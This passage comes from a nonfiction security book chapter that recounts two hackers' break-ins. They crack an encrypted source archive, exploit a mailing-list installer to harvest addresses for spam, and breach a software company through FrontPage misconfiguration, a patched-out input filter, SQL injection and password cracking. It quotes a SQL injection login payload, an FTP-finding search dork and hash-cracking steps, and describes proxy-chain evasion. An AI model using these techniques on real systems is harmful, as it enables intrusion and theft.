     guy was on the server at that time looking at log files. He knew I
     was doing something — basically, he caught me.

  Whoever had detected Erik’s presence wasted no time in quickly eras-
ing critical files. The game was up . . . or was it?
  Erik disconnected and didn’t go back for a month. By now he’d been
struggling to get the software for many months, and you might think he
would have been getting exasperated. Not so, he says.
164                            The Art of Intrusion


      I never get frustrated because it’s just more of a challenge. If I
      don’t get in at first, it’s just more to the puzzle. It’s certainly not
      frustrating. It’s a lot like a video game, how you go from level to
      level and challenge to challenge. It’s just part of the whole game.

  Erik practices his own brand of faith — one that with enough perse-
verance always pays off.

      If one thing didn’t work, I’d just try something else because I
      knew there was something that would work. There is always some-
      thing that works. It’s just a matter of finding out what.


Back into Enemy Territory
Despite the setback, about a month later he was at it again, connecting
to the CEO’s computer for another look at the chat log (he actually saved
his chat logs), to see if there were any notes about somebody reporting
anything about being hacked. Remembering the day and exact time at
the company’s location that he had been spotted, Erik scanned the log.
No mention of a hacker or an unauthorized attempt to download. He
breathed a sigh of relief.
  What he did find instead was that he had been very lucky. At almost the
exact same time, there’d been an emergency with one of the company’s
clients. The IT guy had abandoned whatever else he’d been doing to deal
with the situation. Erik found a later entry that the guy had checked the
logs and run a virus scan but didn’t do anything more. “It was like he
thought it looked suspicious. He looked a little bit into it, but couldn’t
explain it,” so he had just let it go.
  Erik retreated and waited for more time to pass, then reentered, but
more cautiously, only during off-hours, when he could be pretty certain
that no one was around.
  Piece by piece he downloaded the entire file of the source code, bounc-
ing the transmissions through an intermediary server located in a foreign
country — and for good reason, since he was doing all this from his home.
  Erik described his familiarity with the company’s network in terms that
may sound suspiciously grandiose at first, but when you consider the
amount of time he spent ferreting the countless ins and outs of this com-
pany’s system, breaking it down one small step at a time until he knew its
most reclusive intimacies and quirks, the statement certainly lies within
the bounds of believability.

      I knew their network better than anyone there knew it. If they
      were having problems, I could probably have fixed them for them
                Chapter 8   Your Intellectual Property Isn’t Safe            165

     better than they could. I mean, I seriously knew every part of their
     network inside and out.


Not There Yet
What Erik now had, at last safely downloaded on his computer, was the
source code for the server software . . . but not yet in a form he could
open and study. Because the software was so large, the developer who
stored it on the backup server had compressed it as an encrypted ZIP file.
He first tried a simple ZIP password-cracking program, but it failed to
make a dent. Time for Plan B.
  Erik turned to a new and improved password cracker called PkCrack,
which uses a technique called the “known plaintext attack.” Having
knowledge of a certain amount of plaintext data that is part of the
encrypted archive is all that’s needed to decrypt all the other files within
the archive.

     I opened the ZIP file and found a “logo.tif” file, so I went to their
     main Web site and looked at all the files named “logo.tif.” I
     downloaded them and zipped them all up and found one that
     matched the same checksum as the one in the protected ZIP file.

  Now Erik had the protected ZIP file and an unprotected version of the
“logo.tif” file. PkCrack took only five minutes to compare these two ver-
sions of the same file and recover the password. With the password, he
quickly unzipped all the files.
  After hundreds of long nights, Erik finally had the full source code he
had been hungering after.
  As for what kept him sticking to this task for so long, Erik says:

     Oh, easy, it’s all about being sexy. I like having a challenge, and
     I like not being detected. I like doing things differently, and very
     quietly. I like finding the most creative ways to do something.
     Sure, uploading a script is easier; but my way was soooo much
     cooler. F___k being a script kiddie if you can avoid it — be a
     hacker.

   And what did he do with the software and key generator? The answer
is that he and Robert, the hero of the following story, both follow much
the same routine as each other, the routine that is common among many
of the world’s crackers. You’ll find the story in the section called
“Sharing: A Cracker’s World” near the end of the chapter.
166                          The Art of Intrusion


ROBERT,        THE    SPAMMER’S FRIEND
In far away Australia there lives another of those upright gentlemen who
are respected security professionals by day and become a black-hat hacker
by night, honing the skills that pay their mortgage by hacking into the
most resilient software companies on the planet.
  But this particular man, Robert, can’t be easily pegged into a category.
He seems too complex for that — one month hacking for some software
for his own amusement and to satisfy his need for a challenge and the
next month taking on a project for money that will mark him for some
people as what he himself terms “a dirty spammer.” Not dirty, you will
discover, just because he has occasionally worked as a spammer; dirty
because of the kind of spamming he has done.
  “Making money by hacking,” he says, “is quite a concept.” Which may
be self-justification, but he had no qualms about sharing the story with
us. In fact, he brought it up unprompted. And made light of it by coin-
ing a term: “I guess you could say I’m a spacker — a hacker that works
for spammers.”

      I was contacted by a friend of mine who said, “I want to sell some
      hard-core bondage porn to thousands of people. I need to have
      millions upon millions of email addresses of people who want
      hard-core bondage porn.”

  You or I might have run from the suggestion. Robert “thought about it
for a while” and then decided to take a look at what might be involved. “I
searched all these hard-core bondage sites,” he says, admitting that he did
this despite its being “much to my girlfriend’s disgust.” He conducted the
search in a perfectly straightforward way: with Google, as well as another
search portal, www.copernic.com, that uses multiple search engines.
  The results provided a working list. “The only thing I want from these
[sites] is who likes their bondage porn, who wants to receive updates
from them, who has the interest in this shit.” If Robert was going to help
create spam, he had no intention of going about it “like the usual cast of
idiots,” sending hundreds of emails to everyone and his brother whether
they had ever shown any interest in the subject or not.


Getting the Mailing Lists
Many of the bondage Web sites, Robert discovered, were using a major
application for managing subscription mailing lists that I’ll call
SubscribeList.
                Chapter 8   Your Intellectual Property Isn’t Safe             167

     Just by using Google I had found someone who had ordered a copy
     of [SubscribeList], and had it on the Web server. I think it was a
     Web site in Taiwan or in China.

  The next step was even easier than he could have anticipated:

     Their Web server was configured incorrectly. Any user could view
     the source [code] of the software. It wasn’t the latest version of the
     software, but a reasonably recent version.

  The mistake was that someone had carelessly or accidentally left a com-
pressed archive of the source code on the document root of the Web
server. Robert downloaded the source.
  With this program and names he would capture from existing sites,
Robert figured:

     I’d be able to send out emails saying, “Come back to my site, we’re
     having a special on whipping and it’s half price.”
     A lot of people subscribe to these things.

   So far, though, he had mailing-list software but still no mailing lists.
   He sat down to study the source code of SubscribeList, and at length
discovered an opportunity. The technical explanation is complicated (see
“Insight” at the end of the chapter).
   Similar to the way the cracker in the previous story used the “&” sym-
bol to trick a program into executing his commands, Robert used a flaw
in “setup.pl.” This shortcoming, called the “backticked variable injection
flaw,” is based on the lightweight installer program, the setup.pl script,
not adequately validating the data passed to it. (The difference is in oper-
ating system. Erik’s method works with Windows; Robert’s with Linux.)
A malicious attacker can send a string of data that would corrupt a
value stored in a variable in such a way that the script could be tricked
into creating another Perl script used to execute arbitrary commands.
Thanks to this programmer oversight, an attacker could inject shell
commands.
   The method fools setup.pl into thinking that the attacker has just
installed SubscribeList and wants to do the initial setup. Robert would be
able to use this trick with any company running the vulnerable version of
the software. How did he find a bondage company that fit the description?
   His code, Robert says, is “a bit of a mind bender, really a bitch to
write.” When his script had finished, it would clean up after itself and
168                            The Art of Intrusion


then set all the configuration variables back so no one could tell anything
happened. “And as far as I’m aware, no one has caught on to it.”
  No thoughtful hacker would have these files sent directly to his or her
own address in a way that could be traced.

      I’m a really big fan of the Web. I love the Web. The Web is anony-
      mous. You can go on from an Internet café and no one knows who
      the f___k you are. My stuff is bounced around the world a few
      times and it’s not direct connections. It’s harder to trace, and
      there will only be maybe one or two lines in the [company’s] log file.


Porn Payoff
Robert had discovered that many of the bondage sites use the same mailing-
list software. With his modified program, he targeted their sites and grabbed
their mailing lists, which he then turned over to his friend, the spammer.
Robert wanted it understood that “I wasn’t spamming people directly.”
   The campaign was incredibly effective. When you’re spamming directly
to people who you already know “really like this shit” (to use Robert’s
colorful phrase), the rate of response was record-breaking.

      You’re usually looking at [a response rate of] 0.1, 0.2 percent.
      [We were] getting 30 percent at least by targeting. Like 30 to 40
      percent of people would buy. For a spamming rate, that is
      absolutely phenomenal.
      All up, I must have brought in probably like about $45, $50,000
      U.S., and I got back a third of that.

  Behind the success of this sordid story lies the success of Robert’s effort
in gathering the mailing lists of people willing to shell out money for this
kind of material. If the numbers he reported to us are accurate, it’s a
sorry measure of the world we live in.
  “I got,” he said, “between 10 and 15 million names.”


ROBERT         THE     MAN
Despite that episode, Robert insists that “I am not some dirty horrible
spammer; I’m a very upstanding person.” The rest of his story supports
the claim. He works in security for a “very religious and upstanding
company” and takes on outside projects as an independent security con-
sultant. And he’s a published author on security topics.
                Chapter 8   Your Intellectual Property Isn’t Safe          169

  I found him particularly verbal in expressing his attitudes about hacking:

     I really like to be challenged against a system and I like to fight
     the system on a configurational level and a social level, rather
     than a strictly technical level — a social level, meaning getting
     into [the head of] the person behind the computer.

  Robert has a long background in hacking. He mentioned a friend (an
American hacker whose name he didn’t want revealed) who used to have
a game with Robert.

     We both used to [hack into] a lot of development companies, like
     people who were creating Active X controls and Delphi controls,
     and little cool tools for programming. We would find a magazine
     on the subject and there’s an ad on every other page of these new
     products. And we would see if we could find someone we hadn’t
     hacked. Especially games.

He has “wandered around” the internal networks of major gaming soft-
ware companies and gotten source code to a few of their games.
  Eventually, he and his hacker buddy began to find that “we had actu-
ally broken into practically everyone who was advertising every new
product out there. ‘We’ve done this one, this one, this one . . . We’re still
trying to get into here, but got this one.’”
  Still, for Robert, one area held special interest: software products for
what’s called “video post production” — in particular, the products used
to create the animation used in movies.

     I love the mess involved in what these people do. There’s some
     geniuses that make these things. I like to read it and know how it
     works, because it seems so alien when you look at it. I mean when
     you watch [the animated movie] on TV you probably go, “Holy
     f___k, this is really something.”

  What he finds especially intriguing is looking at the code, at a pure
mathematical level — “the equations and the functions, and the mindset
behind the people that create these things. It’s phenomenal.”
  All of this set him up for what he sees as his most memorable hack.


Software Temptation
In 2003, Robert was reading through a product announcement in a soft-
ware magazine and came upon a new product for doing “digital video
170                            The Art of Intrusion


effects, cool lighting stuff — making light look real, with textures [that]
were amazingly smooth.”
  The whole selling point of this product was that it was used on a recent
major animated feature film — one of the designing, modeling, and ren-
dering tools they used.

      When I heard about it, it looked really cool. And some people from
      the circles I’ve been around, like on the Net, had been very interested
      in the software. A lot of people wanted to get their hands on it.
      Everyone wants to get this application because it’s hard to get, it’s
      really expensive — as in maybe two or three hundred thousand.
      It’s used by, like, Industrial Light and Magic, and there’s proba-
      bly, like, only four or five other companies in the world that have
      bought it.
      Anyway, I was really keen on getting this software and I set out
      on casing the company. I’ll just call them Company X. Is that
      okay? Company X was fully based in America and their entire
      network was centralized.

   His goal wasn’t just to get the software for himself but to share it where
it would be available to millions of Internet users worldwide.
   He found the company had “a firewall out front, and a tight little net-
work. They had a lot of servers, and multiple Web servers. I guessed from
this that they probably had maybe 100, 150 employees.”


Discovering Server Names
Robert has a standard strategy when he’s trying to break into a corporate
network that’s of significant size. He “goes after how they take care of
the need for people to be able to get into their network. A large company
has a much greater challenge in this than a small one. If you have five
employees, you can send them an email, right? Or, you can see them all
and say, ‘This is how you connect to your server from home, this is how
you get your email from home.’”
  But a large company will usually have a help desk or some external
resource that people can go to when they’re having a computer problem.
Robert figures that a company with a significant number of employees
will have a set of instructions somewhere — most likely from its help
desk — explaining how to access files and email remotely. If he could find
those instructions, he could probably learn the steps for getting onto the
network from outside, such as what software is needed to connect to the
internal network over the corporate VPN. In particular, he was hoping to
               Chapter 8   Your Intellectual Property Isn’t Safe           171

find out what access points the developers used to access the develop-
ment system from outside, because they would have access to the much-
coveted source code.
  So his challenge at this stage was to find his way to the help desk.

     I started using a little utility called the Network Mapper, some-
     thing I wrote myself. It basically goes sequentially through a list
     of typical host names. I use it as my sequential DNS resolver.

  The Network Mapper identifies hosts and provides the IP address for
each. Robert’s short Perl script simply went down a list of commonly
used hostnames and checked to see if it existed with the target company’s
domain. So, for an attack on a company called “digitaltoes,” the script
might look for web.digitaltoes.com, mail.digitaltoes.com, and so on.
This exercise had the potential of uncovering hidden IP addresses or net-
work blocks that were not easily identified. On running the script, he
might get back results looking like the following:

  beta.digitaltoes.com
  IP Address #1:63.149.163.41...
  ftp.digitaltoes.com
  IP Address #1:63.149.163.36...
  intranet.digitaltoes.com
  IP Address #1:65.115.201.138...
  mail.digitaltoes.com
  IP Address #1:63.149.163.42...
  www.digitaltoes.com
  IP Address #1:63.149.163.36...

  This would reveal that our fictitious company “digitaltoes” has some
servers in the 63.149 net block, but I’d put my money on the server in
the 65.115 net block with the name “intranet” as being their internal
network.


A Little Help from helpdesk.exe
Among the servers Robert discovered with his Network Mapper was the
one he had hoped for: helpdesk.companyX.com. When he tried to go to
the site, though, a login dialog box appeared demanding a username and
password, restricting access to authorized users.
  The helpdesk application was on a server running IIS4, an ancient ver-
sion of Microsoft’s Internet Information Server (IIS) software, which
Robert knew had a number of vulnerabilities. With a little luck, he might
find a useful one that had not been patched.
172                           The Art of Intrusion


   Meanwhile he also discovered a gaping hole. Some company administra-
tor had enabled MS FrontPage in such a way that anyone could upload or
download files from the root directory where the Web server files are stored.
   (I’m familiar with the problem. One of the Web servers at my security
startup company was hacked using a similar vulnerability because the vol-
unteer system administrator who was giving me a hand did not properly
configure the system. Fortunately, the server was a standalone system, on
its own network segment.)
   Recognizing that this mistake gave him the ability to download and
upload files to the server, he began looking at how the server was set up.

      The most common thread with some dumb IIS servers is that
      [whoever set it up] enabled FrontPage authoring.

  And, in fact, this site had a weakness. Deploying Microsoft FrontPage
(an application program used to easily create and edit HTML documents)
without setting the proper file permissions is sometimes an oversight by a
system administrator, sometimes intentionally configured this way for
convenience. In this case, it meant anyone could not only read files but
could also upload files to any unprotected directory. Robert was stoked.

      I was looking at it and going, “Holy shit, I can read or edit any
      pages on the server without needing a username or password.”
      So I was able to log in and look at the root of the Web server.

  Robert thinks that most hackers miss an opportunity here.

      The thing is that when people set up a scanner network for a
      server, they often don’t look for common misconfigurations with
      server extensions like FrontPage. They look [to see what kind of
      server it is] and say, “Well, it’s just Apache” or “It’s just IIS.”
      And they miss making their work much easier if FrontPage has
      been misconfigured.

  It wasn’t as much of a blessing as he had expected, since “there wasn’t
really a whole lot on that server.” Still, he noticed that an application called
helpdesk.exe would come up when he accessed the site through his browser.
That could prove highly useful, but required a login with password.

      So, I’m looking at it thinking how the f___k can I attack this?
      One thing I don’t like doing is uploading some other file to a
      Web server, because if the administrators look through their Web
               Chapter 8   Your Intellectual Property Isn’t Safe         173

     logs and see a thousand people going to helpdesk.exe and all of a
     sudden one guy in the South Pacific is going to two.exe or some
     other thing, that would make them think twice, right? So I try to
     stay out of the logs.

   The helpdesk application consisted of a single executable and a
dynamic-link library (DLL) file (files with the .DLL extension contain a
collection of Windows functions the application can call on).
   With the ability to upload files to the Web root, an attacker could eas-
ily upload a simple script allowing him or her to execute commands
through his or her browser. But Robert isn’t just any attacker. He prides
himself on being stealthy, leaving few if any traces in the Web server logs.
Instead of just uploading a customized script, he downloaded the
helpdesk.exe and helpdesk.dll files to his computer to analyze how the
application worked, relying on some of his background experience. “I’ve
done a lot of reverse engineering applications and looking at things in
assembler,” so he knew how to go about working with the compiled C
code and reversing most of it back to assembler.
   The program he turned to was called IDA Pro, the Interactive
Disassembler (sold by www.ccso.com), used, as he describes it, “by a lot
of, like, virus companies and worm hunters, looking to decompile some-
thing to an assembler level and read it and figure out what it’s doing.”
He decompiled helpdesk.exe and, approving of work performed by pro-
fessional programmers, decided that it was “written quite well.”


From the Hacker’s Bag of T ricks:
the “SQL Injection” Attack
Once he had the program decompiled, Robert examined the code to see
whether the helpdesk application was susceptible to “SQL injection,” an
attack method that exploits a common programming oversight. A security-
conscience programmer will sanitize any user query by including code
that, among other things, filters certain special characters such as the
apostrophe, quotation mark, and greater-than and less-than symbols.
Without filtering characters such as these, the door may be left open for
a malicious user to trick the application into running manipulated data-
base queries that may lead to a full system compromise.
  In fact, Robert had realized that the helpdesk application had indeed
made the proper sanitation checks to prevent someone from using SQL
injection. Most hackers would have just upload an ASP script to the Web
server and be done with it, but Robert was more concerned with being
covert than exploiting a simple vulnerability to compromise his targets.
174                           The Art of Intrusion


      I thought, “That’s quite fun, that’s quite cool. I’m gonna enjoy
      this.”
      I thought to myself, “Well, I’m gonna enable SQL injection by
      screwing up the validity check.” I found the string of where the
      invalid characters were kept and I changed them all to, I think
      it was a space or a tilde (~) or something else that I wasn’t gonna
      be using, but at the same time it wouldn’t affect anyone else.

   In other words, he modified the program (using a hex editor to
“break” the routine designed to verify user input) so that the special char-
acters would no longer be rejected. This way, he could secretly perform
SQL injection without changing the behavior of the application for any-
one else. Another added bonus was that the administrators would not
likely check the integrity of the helpdesk application, since there would
be no obvious signs it had been tampered with.
   Robert then sent his modified version of the helpdesk application to the
Web server, replacing the original version. The way some people collect
stamps, postcards, or matchbooks from places they’ve been, hackers some-
times keep not just the spoils of their break-ins but the code they used as
well. Robert still has a binary compiled copy of the executable he created.
   Since he was working from home (gutsy, and not recommended unless
you want to get busted), he uploaded his “new and improved” version of
the helpdesk application through a chain of proxy servers — which are
servers that act as a mediator between a user’s computer and a computer
he or she wants to access). If a user makes a request for a resource from
computer A, this request is directed to the proxy server, which makes the
request, gets the response from computer A, and then forwards the
response to the client.
   Proxy servers are typically used for accessing World Wide Web resources
from inside a firewall. Robert increased his security by using several proxy
servers located in different parts of the world to lessen the likelihood that
he could be identified. So-called “open proxies” are commonly used like
this to mask the origin of a cyber attack.
   With his modified version of the helpdesk application up and running,
Robert connected to the targeted site using his Internet browser. When
presented with an input form requesting username and password, he
launched a basic SQL injection attack, as he had planned. Under normal
circumstances, once a user enters a username and password — say,
“davids” and “z18M296q” — the application uses these inputs to gen-
erate a SQL statement such as the following:

  select record from users where user = ‘davids’ and password = ‘z18M296q’
               Chapter 8   Your Intellectual Property Isn’t Safe      175

  If the user field and the password field match the database entries, then
the user is logged in. That’s the way it’s supposed to work; Robert’s SQL
injection attack went like this: In the username field, he entered

  ‘ or where password like’%--

For password, he entered the identical statement

  ‘ or where password like’%--

  The application used these inputs to generate a SQL statement similar
to the following:

  select record from users where user = ‘’ or where password
  like ‘%’ and password = ‘’ or where password like ‘%’

   The element or where password like % tells SQL to return the record if
the password is anything at all (the “%” is a wildcard). Finding that the
password did meet this nonsense requirement, the application then
accepted Robert as a legitimate user, just as if he had input authentic user
credentials. It then logged him in with the credentials of the first person
listed in the user database, usually an administrator. That turned out to
be the case here. Robert found himself not only logged in, but logged in
with administrator privileges.
   From there, he was able to see the message of the day that an employee
or other authorized user sees after successfully logging in. From a series
of these messages, he gleaned information on dial-up numbers for calling
into the network and, in particular, hyperlinks for adding and removing
users from the VPN group under Windows. The company was using
Microsoft’s VPN services, which is set up so that employees use their
Windows account names and passwords to sign in. And since Robert was
logged in to the helpdesk application as one of the administrators, this
gave him the ability to add users to the VPN group and change user pass-
words for Windows accounts.
   Making progress. Yet, so far, he was just logged in to an application as
an administrator; that didn’t get him closer to their source code. His next
goal was to gain access to their internal network through their VPN
setup.
   Just as a test, through the helpdesk menu he tried changing the pass-
word of what appeared to be a dormant account, and added it to the
VPN users and administrator’s group — which meant that his activities
would be less likely to be noticed. He figured out some details of their
VPN configuration, so he could then “VPN in. This is good, but it plays
a bit slowly.”
176                          The Art of Intrusion


      I got in at about 1:00 a.m. their time. With me being in the
      Australia time zone is very nice. It can be 1:00 a.m. in America,
      but during the working day here. I wanted to go in when I was
      sure the network was empty, I didn’t want anyone logged in or
      people to notice this. Maybe they have active reporting of everyone
      who’s going in. I just want to be sure.

   Robert has a sense that he understands how IT and network security
people work, and it’s not all that different from everyone else in the
working world. “The only way for them to notice [my going online]
would have been going through the logs actively.” His view of IT and
security people isn’t very flattering. “People don’t read logs every morn-
ing. When you get to your desk, you sit down, have a coffee, read some
Web sites of personal interest. You don’t go in and read logs and see who
changed their passwords yesterday.”
   One of the things he had noticed in his hacking efforts, Robert says, is
that “when you change something on a site, people will either catch it
right away, or they won’t catch it at all. The change I made to that Web
application would have been noticed if they’d been running something
like Tripwire,” he said, referring to an application that verifies the
integrity of systems programs and other applications by doing a crypto-
graphic checksum and comparing it against a table of known values.
“They would have noticed that the executable had changed.”
   At that point he felt reassured, citing the now-familiar term about
“M&M security” — hard on the outside but very soft and chewy on the
inside. “No one really cares if someone looks around their network
because you are inside the premises.” Once you’ve managed to penetrate
the perimeter security, you’re pretty well home free.” (The phrase means
that once an attacker is on the inside and using resources like any author-
ized user, it’s difficult to detect his unauthorized activity.)
   He found that the account he hijacked (changed the password to)
through the helpdesk application allowed him onto the network through
the Microsoft VPN service. His computer was then connected to the
company’s internal network, just as if he were using a computer physi-
cally plugged into the network at the company’s premises.
   So far, he had been careful to do nothing that would create log entries a
conscientious systems administrator might notice, and he was sailing free.
   Once connected to the company’s internal network, Robert mapped
Windows computer names to their IP addresses, finding machines with
names like FINANCE, BACKUP2, WEB, and HELPDESK. He mapped
others with people’s names, apparently the computers of individual
employees. About this, he reiterated a point made by others in these pages.
               Chapter 8   Your Intellectual Property Isn’t Safe     177

  When it came to names of the servers, someone in the company had a
whimsical sense of humor familiar in parts of high tech. The trend started
at Apple Computer in its early boom days. Steve Jobs, with his creative
streak and his break-all-the-rules approach, decided that the conference
rooms in the company buildings wouldn’t be called 212A or the Sixth
Floor Conference Room or anything else so everyday and boring.
Instead, the rooms were named after cartoon characters in one building,
movie stars in another, and so on. Robert found that the software com-
pany had done something similar with some of their servers, except that
with their connection to the animation industry, the names they chose
included the names of famous animation characters.
  It wasn’t one of the servers with a funny name that attracted him,
though. It was the one called BACKUP2. His search there produced a
gem: an open network share called Johnny, where some employee had
backed up a lot of his or her files. This person appeared to be someone
feeling pretty comfortable and not very concerned about security.
Among the files on the directory were a copy of an Outlook personal file
folder, containing copies of all saved emails. (A network share refers to a
hard drive or a part of a drive that has been intentionally configured to
allow access or sharing of files by others.)


The Danger of Backing Up Data
A common denominator in most of us is that when we want to do a
backup, we want to make it really easy for ourselves. If there’s enough
space available, we back up everything. And then we forget about it. The
number of backups lying around becomes enormous. People just let
them build up, they gather, and nobody ever thinks about removing
them until the server or backup device runs out of space.
  “Often,” Robert comments, “the backup contains critical, essential,
amazing information which no one gives any thought to because it’s the
backup. They treat it with really low security.” (During my own younger
hacking days, I noticed the same thing. A company would go to extreme
lengths to protect certain data, but the backups of the same data were
treated as unimportant. When I was a fugitive, I worked for a law firm
that would leave their backup tapes in a box outside the secured com-
puter room entrance to be picked up by an off-site storage company.
Anyone could have stolen the tapes with little danger of being caught.)
On BACKUP2, he noticed a shared area where someone had backed up
all his goodies — everything. He imagined how it had happened, and the
story will have a familiar ring to many:
178                           The Art of Intrusion


      This guy had been in a hurry one day. He thought, “I need to back
      this up,” so he’d done it. And, after being backed up like maybe
      three or four months ago, it was still sitting there.
      So, this gives me a feel for the network and really how maybe the
      sys admins worked, because this wasn’t some developer person or
      someone without access. This was someone who could create a net-
      work share, but he obviously wasn’t amazingly worried about
      security.

 Robert went on:

      If he’d been anally secure like me, he would have had a password
      on that share, and he maybe would have called the share some-
      thing random. And he would have removed it afterwards.

   Even better, from Robert’s perspective: “He had a copy of his Outlook
in there as well” with all of his addresses and contacts. “I copied out the
file archive,” Robert says. “I retrieved his Outlook.pst file with all his
email, 130 or 140 megs.”
   He logged off and spent a few hours reading the guy’s email. He
uncovered “Public announcements, pay changes, performance reviews,
everything about this guy. I found out quite a bit of information about
him — he was one of the lead sys admins on the network and he was
responsible for all of the Windows servers,” Robert said “And I was able
to gain through his box who the other sys admins were and who had a
lot of access.” It got even better:

      The information within his email was extremely useful. I was
      able to develop a list of people who would likely have access to the
      source code I wanted. I wrote down all their names, all the details
      I could get. Then I went around and I searched the guy’s entire
      mail file for “password,” and what I found was a couple of regis-
      trations, one of them with some network appliance company.
      He had set up an account on their support side using his email
      address and a password. And he had done this for two or three
      vendors. I found the emails that had come back [from the com-
      panies] saying, “Thank you for registering your account, your
      username is this, your password is that.” The password was
      “mypassword” for two different companies.

 So, maybe, just maybe, it was the same one he was using at work.
People are lazy, so this would definitely be worth a try.
               Chapter 8   Your Intellectual Property Isn’t Safe     179

   Good guess. The password did work for one of his accounts on the
company server. But it wasn’t the domain administrator account that
Robert had been hoping for, which would have allowed him access to the
master accounts database, which stores every domain user’s username
and hashed password. That database was being called on to authenticate
users to the entire domain. He apparently had a single username, but had
different levels of access depending on whether he logged in to the
domain or the local machine. Robert needed Domain Administrator
access to gain access to the company’s most sensitive systems, but the
administrator was using a different password for the Domain
Administrator account, one that Robert didn’t have. “That really flecked
me off,” he complained.
   The whole business was beginning to get more than a little frustrating.
“But I figured that I could eventually find his password to the other
account just by looking around other resources.”
   Then the situation started to brighten. He found that the company was
using a project-management application called Visual SourceSafe and
managed to get access to the external password file, which was apparently
readable by any user who had access to the system. Attacking the pass-
word file with public domain password cracking software, it took “maybe
like a week and a half, two weeks, and I had a different password for the
man.” He had recovered a second password for the administrator he had
been bird-dogging. Time for a little celebration. This password was also
used for the Domain Administrator account, which gave Robert access to
all the other servers he wanted to get into.


Password Observations
Passwords are very personal things, Robert says. “And how you can tell
very strict companies is when they give everyone a password and that
password’s very anal and very strict. But you can tell very relaxed com-
panies when the default password is a day of the week, or the default pass-
word is the name of the company or something equally mindless.”
  (Robert shared with me that at the company where he works, an
employee’s password is set to the day he starts. When trying to log on,
“You can have seven attempts before the system locks you out, and, of
course, you only need no more than five guesses” if you’re trying to
break into someone’s account.)
  Robert found that a lot of the accounts at the company he was trying
to compromise had a default password in the form of the following:

 companyname-2003
180                        The Art of Intrusion


 He didn’t find any with “2002” or earlier, so it was obvious that they
were all changed on New Year’s Day. Ingenious password management!


Gaining Full Access
Robert could feel himself getting closer to his goal. Armed with the sec-
ond password he had obtained for the administrator whose electronic
identity he had hijacked, he now had access to the password hashes of the
entire domain. He used PwDump2 for extracting the hashes from the
Primary Domain Controller, and l0phtCrack III to crack most of the
passwords.
  (The latest cool trick uses rainbow tables, which are tables of password
hashes and their corresponding passwords. One site, http://sarcaprj.
wayreth.eu.org/, will attempt to crack the password hash for you. You
just submit the LAN Manager and NT hashes, and your email address.
You get an email back with the passwords. Robert explained, “They have
pre-generated certain hashes based on the commonly used character set
in constructing a password, so that instead of needing lots of computing
power, they have 18 or 20 gigabytes of pre-generated hashes and the cor-
responding passwords. It’s really quick for a computer to scan through
the pre-computed hashes to find a match, asking, ‘Are you this? Are you
this? Are you this? Okay — you’re this.’” A rainbow tables attack reduces
the cracking time to seconds.)
  When l0phtCrack finished, Robert had the passwords for most every
user in the domain. By this time, from information in the emails he had
hijacked earlier, he had put together a list of people who had exchanged
messages with the systems administrator. One was from a worker who
had written about a server that had broken, complaining, “I’m unable to
save any new revisions and I can’t develop my code.” So he was obviously
a developer, which was valuable information. Robert now looked up the
developer’s username and password.
  He dialed in and signed on with the developer’s credentials. “Logged
on as him, I had full access to everything,”
  “Everything” is this case meaning, in particular, the source code of the
product — “that’s the keys to the kingdom.” And he had it. “I wanted
to steal the source. There was everything I wanted,” he recounts happily.


Sending the Code Home
Robert had now seen the glow of the gold he had been seeking. But he
still had to find a way — a safe way — of getting it delivered to his
doorstep. “They were pretty hefty files,” he says. “I think the entire
source tree was around a gig, which would take me f___king weeks.”
               Chapter 8   Your Intellectual Property Isn’t Safe      181

  (At least it wasn’t nearly as bad as trying to download a huge com-
pressed file with a 14.4K baud modem, which is what I had done when
I copied off hundreds of megabytes of VMS source code from Digital
Equipment Corporation years earlier.)
  Because the source code was so huge, he wanted a much faster connec-
tion for sending it. And he wanted a delivery path that couldn’t easily be
traced back to him. The fast connection didn’t present much of a problem.
He had previously compromised another company in the United States that
used Citrix MetaFrame, which was another sitting duck on the Internet.
  Robert established a VPN connection into the target company and
mapped a drive to where the source code resided. He simply copied it off.
“I used that Citrix server to VPN into [the software company’s] network
again, and then mapped to the share. And then I copied all the source
code, binaries, and other data to the expendable Citrix server.”
  To find a route for delivering the files safely, untraceably (he hoped),
he used my own favorite search engine, Google, to locate an anonymous
FTP server — which allows anyone to upload and download files to a
publicly accessible directory. Moreover, he was looking for an anonymous
FTP server that had directories also accessible via HTTP (using a Web
browser.) He figured that by using an anonymous FTP server, his activ-
ity would be “buried in the noise” because many others would also be
using the server to trade porn, warez, music, and movies.
  The search term he used in Google was the following:

  index of parent incoming inurl:ftp

This searches for FTP servers set up to permit anonymous access. From
the servers identified by the Google search, he selected one that met his
criteria for HTTP downloads as mentioned previously, so he could down-
load the code from his Web browser.
  With the source files already transferred from the company to the com-
promised Citrix server, he now transferred them again to the anonymous
FTP server he had located from the Google search.
  Now there was only one final step remaining before he could, at long
last, have the precious source code in his possession: transferring from the
FTP server to his own computer. But “at the end of the day, I don’t want
to have my Internet address downloading all this source code, and espe-
cially not for hours and hours, if you know what I mean.” So before
transferring the files to the FTP server, he zipped them into a smaller
package, giving it an innocuous name (“gift.zip, or something like that”).
  Once again he used a chain of open proxy servers to bounce his con-
nection in a way that makes it unlikely to be traced. Robert explains,
182                          The Art of Intrusion


“There’s like a hundred open Socks proxies in Taiwan alone. And you
know at any time maybe a hundred people will be using any one of these
proxies.” So if they’ve enabled logging at all, that makes logs really quite
big, meaning that it’s highly unlikely the guys in suits are going to man-
age to bloodhound you and come knocking at your door. “You’re like
the needle out of the haystack. It’s just too cumbersome.”
  Finally, after all his effort, the transmission was on its way.

      I couldn’t believe that code was downloading to me. It was a
      really big thing.


SHARING: A CRACKER’S WORLD
What does a hacker like an Erik or a Robert do once they have the cov-
eted software in hand? For both of them, as for others for whom the term
“cracker” or “software pirate” applies, the answer is that most of the
time, they share the software they have pirated with many, many others.
  But they do the sharing indirectly.
  Erik explained the steps he followed after nabbing the server software
he had spent two years thirsting after. The application had been written
in a programming language he wasn’t proficient in, but Erik had a friend
who had been a programmer in the language, so he passed the source
code for generating the unlock or registration code to bypass the licens-
ing security checks. He added a Graphical User Interface (GUI) on top
of the stolen key generator to disguise the origin of the code.

      I gave it to someone else who uploaded the software to one of the
      core Warez sites, archived the whole thing into a package, put the
      keygen in, and created information files [with] instructions on
      how to install and crack the software. I didn’t post it myself.
  When ready to upload the program and keygen, they first checked to
see whether someone else might have cracked the same program already.

      Before you post something, you want to make sure no one else has
      done it first, so you do a “dupe check” to make sure it’s unique.

  The dupe check is easy. The cracker simply goes to www.dupecheck.ru
(the site is located in Russia2) and enters the name and version of the
product. If it’s listed, that means someone else has already cracked it and
posted it to one of the core Warez sites.
                Chapter 8   Your Intellectual Property Isn’t Safe           183

  But just because the software has been posted to the site doesn’t mean
